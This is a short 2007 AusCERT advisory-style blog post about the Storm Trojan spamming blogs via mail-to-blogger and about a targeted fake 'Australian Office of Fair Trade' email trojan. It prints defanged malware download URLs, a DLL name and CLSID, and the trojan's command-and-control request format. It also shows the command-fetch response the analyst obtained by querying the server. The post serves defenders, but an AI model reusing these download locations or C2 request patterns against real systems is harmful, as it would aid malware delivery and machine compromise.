Australia's Leading Computer Emergency Response Team

Trojan Activity
Date: 31 August 2007
Original URL: http://www.auscert.org.au/render.html?cid=7066&it=8032

More Storm



Today we were advised that the Storm Trojan, which is responsible for the
ecard and youtube emails, is now "blogging". The blogs are being posted with the
same subjects and messages we have all become familiar with. The method of posting
to these is via the mail-2-blogger feature, which allows bloggers to send
their latest web log via email. We noticed while digging that the blog posts
tend to include lots of other spam posts. With some further digging, we found
that the Storm Trojan appears to have been doing this for a while, a blog post
dating back to June 30, 2007.

Blog post from storm

The link does point to one of the Storm nodes, which when viewed from a web
browser, will exploit vulnerabilities in the browser based on the User Agent.
If the User Agent does not have known exploits, it returns a plain HTML document
with the link directly to the executable.


Australian Office of Fair Trade Trojan



It is important to point out, although it does have a legitimate ring to the
name, that there is no such organisation in Australia. The trojan seems to be
a very targeted social engineering attempt. The email contains the correct "To" email address and the users correct name.

The original piece of malware arrives in an email as an attachment with a DOC
extension. The malware is embedded into this and appears as a PDF icon.
Which when executed will then download another piece of malware from:

hxxp :// zpnphoto.com / down.php

Down.php then attempts to place a file named "yhelp.dll" in the system root directory,
usually C:\WINDOWS. The DLL is then injected into any currently running Internet
Explorer processes and continues by registering a Browser Helper Object called
"Yahoo! Helper" under the CLSID of "{E838FBB2-574D-4926-9C81-CCB15F3A3F53}".

The malware then gets either updates, new malware or commands from a website
using HTTP requests.

POST /OOO3/parse.php?user=[COMPUTER-NAME]_[USER]&mod=log

Interestingly, if you modify this command to GET the following URL:

hxxp :// 203,121,69,232 /OOO3/parse.php?user=TU-4NH09SMCG1HC_Administrator&mod=cmd

the server returns:

$ @:1:2: @:2:3: @:4:1:hxxp :// evanscomm.ca /cp/2.exe

Note: the URLs have been obfuscated.

This binary is different from the "down.php" binary but it is detected the
same by AV Vendors. The names it is detected as include Trojan-Penta.B or
Fireming.

Cheers
Zane